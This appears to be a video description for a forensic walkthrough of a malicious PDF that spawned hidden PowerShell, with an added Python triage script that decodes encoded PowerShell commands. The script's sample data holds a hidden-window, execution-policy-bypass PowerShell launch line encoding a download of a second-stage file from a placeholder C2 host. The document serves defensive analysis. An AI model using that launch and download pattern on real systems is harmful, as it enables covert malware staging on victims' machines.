
PDF Malware Analysis with Volatility, Any.Run & VirusTotal

1.7K views
Apr 30, 2024
16:38

In this video walkthrough, we covered a cyber incident response case study involving a malicious PDF delivered through a phishing email. Once opened, the PDF spawned a PowerShell session in a hidden window that executed a base64-encoded command to retrieve another malicious file from a C2 server. We extracted the sample using Volatility plugins, then uploaded it to VirusTotal and Any.run to dynamically analyze the malware and extract the related artifacts.

Receive Cyber Security Field, Certifications Notes and Special Training Videos: https://www.youtube.com/channel/UCNSdU_1ehXtGclimTVckHmQ/join

Register and start analyzing malware with Any.run: https://app.any.run/?utm_source=youtube&utm_medium=video&utm_campaign=motasem&utm_content=register&utm_term=300424#register/

Writeup: https://motasem-notes.net/en/memory-forensics-with-volatility-pdf-malware-analysis-with-any-run-cyber-incident-response/

Google Profile: https://maps.app.goo.gl/eLotQQb7Dm6aiL8z6
LinkedIn [1]: https://www.linkedin.com/in/motasem-hamdan-7673289b/
LinkedIn [2]: https://www.linkedin.com/in/motasem-eldad-ha-bb42481b2/
Instagram: https://www.instagram.com/dev.stuxnet/
Twitter: https://twitter.com/ManMotasem
Facebook: https://www.facebook.com/motasemhamdantty/
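The hidden-window, base64-encoded PowerShell launch described above can be triaged directly from process command lines recovered from a memory image. The following is an added example, not code from the video or its writeup; the function names and the sample command lines are constructed for illustration, and the `.invalid` domain is a placeholder.

```python
import base64
import re

URL_RE = re.compile(r"https?://[^\s'\"]+")

def triage_cmdline(cmdline):
    """Flag hidden-window PowerShell and decode any -EncodedCommand payload."""
    result = {"hidden": False, "decoded": None, "urls": []}
    if "powershell" not in cmdline.lower():
        return result
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:] + [""]):
        if len(flag) < 2 or flag[0] not in "-/":
            continue
        name = flag[1:].lower()
        # PowerShell accepts abbreviated parameter names (-w, -enc, -e, ...).
        if "windowstyle".startswith(name) and value.lower() == "hidden":
            result["hidden"] = True
        elif "encodedcommand".startswith(name) or name == "ec":
            try:
                # -EncodedCommand carries Base64 of a UTF-16LE string.
                result["decoded"] = base64.b64decode(value, validate=True).decode("utf-16-le")
            except ValueError:
                continue  # not valid Base64/UTF-16LE; leave for manual review
            result["urls"] = URL_RE.findall(result["decoded"])
    return result

# Constructed sample data (not taken from the video).
SAMPLE_PS = "Invoke-WebRequest -Uri 'http://c2.example.invalid/stage2.bin' -OutFile stage2.bin"
SAMPLE_B64 = base64.b64encode(SAMPLE_PS.encode("utf-16-le")).decode()
SAMPLE_CMDLINES = [
    r"C:\Windows\System32\svchost.exe -k netsvcs",
    r"powershell.exe -NoP -ExecutionPolicy Bypass -w hidden -enc " + SAMPLE_B64,
    r"powershell.exe -File C:\Scripts\backup.ps1",
]

def suspicious(cmdlines):
    """Return triage results for lines that are both hidden and encoded."""
    hits = [triage_cmdline(c) for c in cmdlines]
    return [h for h in hits if h["hidden"] and h["decoded"]]

if __name__ == "__main__":
    for hit in suspicious(SAMPLE_CMDLINES):
        print(hit["decoded"], hit["urls"])
```

The decoded command and any URLs it contains are the artifacts to pivot on when searching proxy and DNS logs for other affected hosts.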

